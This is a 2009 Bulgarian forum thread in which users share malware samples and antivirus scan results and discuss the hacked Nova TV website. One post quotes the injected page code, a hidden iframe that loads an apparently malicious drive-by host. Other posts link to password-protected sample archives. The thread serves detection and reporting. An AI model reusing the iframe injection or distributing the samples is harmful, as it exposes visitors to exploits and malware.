Премини към съдържанието
  • Добре дошли!

    Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

    Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

     

Подпомагане на АВ програмите с дефиниции,откриване на нови заплахи - част 5


Препоръчан отговор


https://www.virustotal.com/ru/analisis/89a3...4e30-1244202165 Ikarus и Comodo обаче също реагират - видно от http://virusscan.jotti.org/en/scanresult/c...e050590f536192d http://virscan.org/report/43373dbf92f39256...4c9e10f560.html Колко много са нереагиращите "лидери"! Файлът е от hxxp://rapidshare.com/files/136875551/Anti-Trojan_Elite_4.1.2.rar Поздрави
Линк към този отговор
Сподели в други сайтове
  • Отговори 1,3k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Потребители с най-много отговори

Популярни публикации

http://virscan.org/report/9a69280751a6614b821e81f2ed38f1e5.html Появи се първият с класифициране. Вариантните защити IDS + HIPS са с безпроблемно справяне и също блокират. ESET и останалите уж лид

File setup_build8_173.exe received on 2009.09.19 18:33:47 (UTC) Result: 7/41 (17.08%) Antivirus Version Last Update Result a-squared 4.5.0.24 2009.09.19 Trojan-Downloader.Win32.FraudLoad!IK DrWe

http://4storing.com/vhi1wd/f8577a3ef758373adc84a62883204fb5.html http://www.virustotal.com/ru/analisis/beeb7fdfdf7e0c652fc2ce652cc01292a0a0a9f77a56a5c6981be1fe7c7be1aa-1253304878 Някой ползващ

Публикувани изображения

Какво става днес? Сайтът на Нова Телевизия, а при мен и сайтът на МОН не се отваря. Някой има ли подобен проблем?

http://www.mon.bg/

Линк към този отговор
Сподели в други сайтове

за МОН може да е това http://www.dnevnik.bg/bulgaria/2009/06/05/...sa_publikuvani/

да са станали много маймуни на клона. :)

Редактирано от pacovw (преглед на промените)
Линк към този отговор
Сподели в други сайтове
може да се пробвате с сайта на Нова Телевизия www.ntv.bg biggrin.gif

"""Сайтът е в процес на обновление. Моля, заповядайте по-късно.""" Нова добавка от Microsoft за IE 8 може да предизвика реакция от някои "лидери" при антивирусите. Нищо необичайно не установявам с корпоративния Симантек. Поздрави


Линк към този отговор
Сподели в други сайтове
Явно вече са се усетили тук има цялата хронлогия линк

http://www.nigma.ru/index.php?s=http+%3A+%...ang=all&rg= А тук е настоящата и следващата фаза на развитие. Поздрави

Линк към този отговор
Сподели в други сайтове

Скрипта ще бъде премахнат от дефинициите на Авира след обсъждане с екипа.

The file 'xmlhttprequest[1].js' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates.
Линк към този отговор
Сподели в други сайтове
"""Сайтът е в процес на обновление. Моля, заповядайте по-късно.""" Нова добавка от Microsoft за IE 8 може да предизвика реакция от някои "лидери" при антивирусите. Нищо необичайно не установявам с корпоративния Симантек. Поздрави

05.6.2009 г. 22:02:37 Задача запущена

05.6.2009 г. 22:02:37 Архив: Embedded D:\Downloads\Documents\readme.pdf

05.6.2009 г. 22:02:38 Обнаружено: HEUR:Exploit.Script.Generic D:\Downloads\Documents\readme.pdf/data0000

05.6.2009 г. 22:02:42 Помещено на карантин: HEUR:Exploit.Script.Generic D:\Downloads\Documents\readme.pdf

05.6.2009 г. 22:02:42 Задача завершена

Просто трябва да изчакаш да се зареди :rolleyes:

Линк към този отговор
Сподели в други сайтове
Просто трябва да изчакаш да се зареди :rolleyes:

Нещото нещо нещеше да се зарежда изобщо при корпоративния Symantec. То сигурно по красота или по друг критерий си ги избира! Сега у дома с KIS 8.0.0.506 пак е следното "Сайтът е в процес на обновление. Моля, заповядайте по-късно." Поздрави

Линк към този отговор
Сподели в други сайтове

"<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Untitled Document</title>

</head>

<body><iframe src="http://hugetoplocate.cn:8080/index.php" width=129 height=187 style="visibility: hidden"></iframe>

Сайтът е в процес на обновление. Моля, заповядайте по-късно."

Пак има iframe ама тоя китайския сайт не го отваря.

Тея ме кефят два дена безмилостна борба с вируса

Редактирано от pacovw (преглед на промените)
Линк към този отговор
Сподели в други сайтове

В архива има и новия ментак - VirusShield (SetupPack.exe).

Част от файловете са от форума на MBAM, други съм получавал на Лични Съобщения от същия форум.

hXXp://4storing.com/xn3pd2/f65a5f3e1869b181d1c364be4baaad6b.html

Qoobox от тази тема: (в поста на electric).

http://www.kaldata.com/forums/index.php?s=...t&p=1412328

Линк към този отговор
Сподели в други сайтове

В архива има и новия ментак - VirusShield (SetupPack.exe).

Част от файловете са от форума на MBAM, други съм получавал на Лични Съобщения от същия форум.

hXXp://4storing.com/xn3pd2/f65a5f3e1869b181d1c364be4baaad6b.html

Qoobox от тази тема: (в поста на electric).

http://www.kaldata.com/forums/index.php?s=...t&p=1412328

http://www.virustotal.com/ru/analisis/ef27...d34f-1244301726

Линк към този отговор
Сподели в други сайтове

TNN няма смисъл да пращаш целия архив за анализ. Вътре са повече от 1 файл...

Qoobox папка:

hXXp://4storing.com/besf6y/a534bee280df2496796e9235a62fcf8c.html
Разни други:
hXXp://4storing.com/r67es5/3ddf84ff13b7161ab4b14d186e1e8d88.html

пароли за папките - infected

Линк към този отговор
Сподели в други сайтове
Аз един път бях със НОД32 напълно легална версия и след като я деиснталирах и сложих Касперски,ми улови 107 троянеца!

Такива изказвания в нета колкото щеш ;) Доказвай!

Линк към този отговор
Сподели в други сайтове

Днес се опитах да заредя страницата на Нова Тв.(ntv.bg) и Avast! сигнализира за троянец ! Странното е, че на самия сайт пише, че "сайта в момента е в обновление, опитайте по-късно" ! Друга антивирусна реагира ли ?

Линк към този отговор
Сподели в други сайтове

Аз пък реших да проверя дали добре ме е пазил през последните седмици KIS 8.0.0.506 и за целта го деинсталирах. Инсталирах Qoutpost Firewall 2009 Free и веднага след стената - Twister Anti-TrojanVirus. Правителственият китаец при сканирането намери само един троянец - в инсталационния файл на The Avenger 2.0, изтеглен от Софтвизия. Нека да коментират считащите се за специалисти - аз съм експериментиращ човек заради едно хоби и за нищо не претендирам. После деинсталирах китаеца и го заместих с Avira Premium 9 - немската програма при настройки на максимум нищо не откри при пълното сканиране. И двете програми могат да се сработят с безплатната руска защитна стена - и за двете дори е по-добре с поорязаната и функционалност. KIS 8.0.0.506 като цялостно функциониране този път ми харесва и вероятно скоро ще го върна отново на линия. Поздрави

Линк към този отговор
Сподели в други сайтове
Аз пък реших да проверя дали добре ме е пазил през последните седмици KIS 8.0.0.506 и за целта го деинсталирах. Инсталирах Qoutpost Firewall 2009 Free и веднага след стената - Twister Anti-TrojanVirus. Правителственият китаец при сканирането намери само един троянец - в инсталационния файл на The Avenger 2.0, изтеглен от Софтвизия. Нека да коментират считащите се за специалисти - аз съм експериментиращ човек заради едно хоби и за нищо не претендирам. После деинсталирах китаеца и го заместих с Avira Premium 9 - немската програма при настройки на максимум нищо не откри при пълното сканиране. И двете програми могат да се сработят с безплатната руска защитна стена - и за двете дори е по-добре с поорязаната и функционалност. KIS 8.0.0.506 като цялостно функциониране този път ми харесва и вероятно скоро ще го върна отново на линия. Поздрави

Avira има много фалшиви тревоги и при комбинация с comodо, не мога да кажа кое точно прецаква компютъра, може би анти-вируса.

KIS8 също не става като цяло. Така или иначе вирусите не могат да бъдат спряни. Не може да определяме само по това коя колко хваща.

Outpost Firewall Pro, е това което никой не иска на комоютъра си - тежко, безполезно и максимално бавищо машината, ставало причина за блокирания през 3 минути.

В момента съм с KIS 2010 с изключен Web Anti-Virus (Защото забавя/90% блокира Flash / Връзката & Браузъра. Отделно защото е безполезен когато използвам Firefox) / Anti-Spam (Само защото използвам gmail.com през FireFox) / Anti-Banner (Защото забавя Flash / Връзката & Браузъра). И по ясни причини изключен Parent Control. Като съм изключил и Windows Firewall и съм направил да не ме пита за всичко. Изключен и addon от FireFox. Пак безполезен. Компютъра работи добре и нямам вируси, като за целта свалям софтуер само от официялни сайтове и блокирам всички скриптове във FireFox, когато посещавам несигурни сайтове.

Линк към този отговор
Сподели в други сайтове
Avira има много фалшиви тревоги и при комбинация с comodо, не мога да кажа кое точно прецаква компютъра, може би анти-вируса.

KIS8 също не става като цяло. Така или иначе вирусите не могат да бъдат спряни. Не може да определяме само по това коя колко хваща.

Outpost Firewall Pro, е това което никой не иска на комоютъра си - тежко, безполезно и максимално бавищо машината, ставало причина за блокирания през 3 минути.

В момента съм с KIS 2010 с изключен Web Anti-Virus (Защото забавя/90% блокира Flash / Връзката & Браузъра. Отделно защото е безполезен когато използвам Firefox) / Anti-Spam (Само защото използвам gmail.com през FireFox) / Anti-Banner (Защото забавя Flash / Връзката & Браузъра). И по ясни причини изключен Parent Control. Като съм изключил и Windows Firewall и съм направил да не ме пита за всичко. Изключен и addon от FireFox. Пак безполезен. Компютъра работи добре и нямам вируси, като за целта свалям софтуер само от официялни сайтове и блокирам всички скриптове във FireFox, когато посещавам несигурни сайтове.

Това е изказване на друг потребител,следващия коментар, който няма връзка с темата,заминава в кошчето!

zF880753.jpg

Линк към този отговор
Сподели в други сайтове
Днес се опитах да заредя страницата на Нова Тв.(ntv.bg) и Avast! сигнализира за троянец ! Странното е, че на самия сайт пише, че "сайта в момента е в обновление, опитайте по-късно" ! Друга антивирусна реагира ли ?

сайта на телевията го хакват доста често тези дни.Днес отново е пипан.От НТВ не могат да се справят с проблема/Да им имам админите

Линк към този отговор
Сподели в други сайтове
сайта на телевията го хакват доста често тези дни.Днес отново е пипан.От НТВ не могат да се справят с проблема/Да им имам админите

Това засича КИС 2010 при отваряне на сайта преди броени минути:

SHU86679.jpg

Линк към този отговор
Сподели в други сайтове

На нова сайта си му инжектват с iframe, който те праща на китайски сайт, който те пробва за дупки в Adobe Reader флаш или directx. Тук има инфо инфо , не е лошо да го прочетат и админите на Нова ТВ , че така е от 03.06 и сега по време на избори не ми се мисли колко машини с кракнат NOD32 и спрени ъпдейти (кой ли мозъчен донор го измисли да се спират ъпдейтите за се олекоти машината) са се набълбукали с троянци. biggrin.gif

Линк към този отговор
Сподели в други сайтове
На нова сайта си му инжектват с iframe, който те праща на китайски сайт, който те пробва за дупки в Adobe Reader флаш или directx. Тук има инфо инфо , не е лошо да го прочетат и админите на Нова ТВ , че така е от 03.06 и сега по време на избори не ми се мисли колко машини с кракнат NOD32 и спрени ъпдейти (кой ли мозъчен донор го измисли да се спират ъпдейтите за се олекоти машината) са се набълбукали с троянци. biggrin.gif

"""Scan type: Auto-Protect Scan

Event: Risk Found!

Security risk detected: Trojan Horse

File: C:\Documents and Settings\Local Settings\Temp\Temporary Internet Files\Content.IE5\CJCVRMPK\flash[1].swf

Location: C:\Documents and Settings\Local Settings\Temp\Temporary Internet Files\Content.IE5\CJCVRMPK

Action taken: Pending Side Effects Analysis : Access denied

Date found: 08. 06. 2009 . 08:57:23""" Това е реакцията на корпоративния Симантек 11 при отваряне на ntv.bg Проблемите още са налице. Поздрави

Линк към този отговор
Сподели в други сайтове
Гост
Тази тема е заключена за нови отговори.
×
×
  • Добави ново...

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите Условия за ползване